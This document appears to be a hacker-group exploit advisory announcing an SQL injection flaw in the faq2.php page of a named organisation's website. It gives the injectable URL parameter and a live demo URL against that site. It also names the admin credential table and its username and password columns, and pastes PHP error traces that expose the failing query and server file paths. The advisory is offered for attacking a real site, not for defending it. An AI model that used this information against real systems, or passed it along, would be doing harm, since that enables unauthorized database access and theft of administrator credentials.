|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|*     ______  ____     __  __                 |
|*    /\__  _\/\  _`\  /\ \/\ \                       |
|*    \/_/\ \/\ \ \L\ \\ \ \_\ \   { Turki$ hackers }       |
|*       \ \ \ \ \  _ <'\ \  _  \                     |
|*        \ \ \ \ \ \L\ \\ \ \ \ \                          |
|*         \ \_\ \ \____/ \ \_\ \_\            |
|*          \/_/  \/___/   \/_/\/_/                  |
|*                                               |
|*                      I'm Wolf Long live wolf          |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title]          :[dgc sql injection vulnerability]            /*   
\* [Author]          :[skote_vahshat]                              /*
\* [Home]          :[Http://turk-bh.ir]                          /*
\* [Email]           :[skote.vahshat@Gmail.Com]                    /*

=======================================================================
/* Web Server ==>> [ Apache/2.0.55 (Ubuntu) PHP/4.4.2-1build1 ]
/* Powered-by ==>> [ PHP/4.4.2-1build1 ]
/* DB Server ==>> [ MySQL ]
/*
/* [+]Exploit :
/*              http://www.target.com/faq2.php?id=[SQLi]
/* [+]Demo:
/*      http://www.dgc.ca/faq2.php?language=0&id=173&faqid=573
/* [+] Tble admin:
/*            bs_availability_user
/*
/* [+]column name:
/*   username    pass
/*
/*    [+]ErroR injection:
/*
/*
/*/-----------------------
/*

/*             SELECT * FROM faq WHERE id = 573
<?php
 = array (
  0 => 
  array (
    'file' => '/mnt/alpha/dgc.ca/include/faq.php',
    'line' => 26,
    'function' => 'querydb',
    'class' => 'faq',
    'type' => '->',
    'args' => 
    array (
      0 => 'SELECT * FROM faq WHERE id = 573\\\'',
    ),
  ),
  1 => 
  array (
    'file' => '/mnt/alpha/dgc.ca/include/faq.php',
    'line' => 20,
    'function' => 'load',
    'class' => 'faq',
    'type' => '->',
    'args' => 
    array (
    ),
  ),
  2 => 
  array (
    'file' => '/mnt/alpha/dgc.ca/faq2.php',
    'line' => 150,
    'function' => 'faq',
    'class' => 'faq',
    'type' => '->',
    'args' => 
    array (
      0 => '573\\\'',
    ),
  ),
);
?>
/*
// QUERY: SELECT id FROM faq WHERE parent_id = 573\' ORDER BY display_order
<?php
 = array (
  0 => 
  array (
    'file' => '/mnt/alpha/dgc.ca/include/faq.php',
    'line' => 201,
    'function' => 'querydb',
    'class' => 'faq',
    'type' => '->',
    'args' => 
    array (
      0 => 'SELECT id FROM faq WHERE parent_id = 573\\\' ORDER BY display_order',
    ),
  ),
  1 => 
  array (
    'file' => '/mnt/alpha/dgc.ca/faq2.php',
    'line' => 151,
    'function' => 'get_children_ids',
    'class' => 'faq',
    'type' => '->',
    'args' => 
    array (
    ),
  ),
);
?>
=======================================================================
|_***_| spical thanks : bl4ck.viper ,dr.tofan , nafsh, netqurd         |  
|_***_| tbh team , cyberwh team ,                    all turkiS hackers|
=======================================================================